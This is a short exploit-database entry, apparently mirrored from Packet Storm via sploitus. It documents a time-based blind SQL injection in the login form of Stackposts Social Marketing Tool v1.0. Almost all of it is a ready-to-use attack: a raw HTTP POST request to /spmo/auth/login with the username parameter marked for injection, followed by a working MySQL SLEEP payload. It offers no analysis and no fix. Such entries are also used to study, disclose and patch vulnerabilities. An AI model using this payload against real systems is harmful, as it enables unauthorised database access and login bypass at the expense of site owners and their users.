Share
## https://sploitus.com/exploit?id=PACKETSTORM:172529
# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection  
# Date: 2023-05-17  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor:  
https://codecanyon.net/item/stackposts-social-marketing-tool/21747459  
# Demo Site: https://demo.stackposts.com  
# Tested on: Kali Linux  
# CVE: N/A  
  
  
### Request ###  
  
POST /spmo/auth/login HTTP/1.1  
X-Requested-With: XMLHttpRequest  
Referer: https://localhost/spmo/  
Content-Type: application/x-www-form-urlencoded  
Accept: application/json, text/javascript, */*; q=0.01  
Content-Length: 104  
Accept-Encoding: gzip,deflate,br  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36  
Host: localhost  
Connection: Keep-alive  
  
csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*  
  
  
### Parameter & Payloads ###  
  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')  
AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg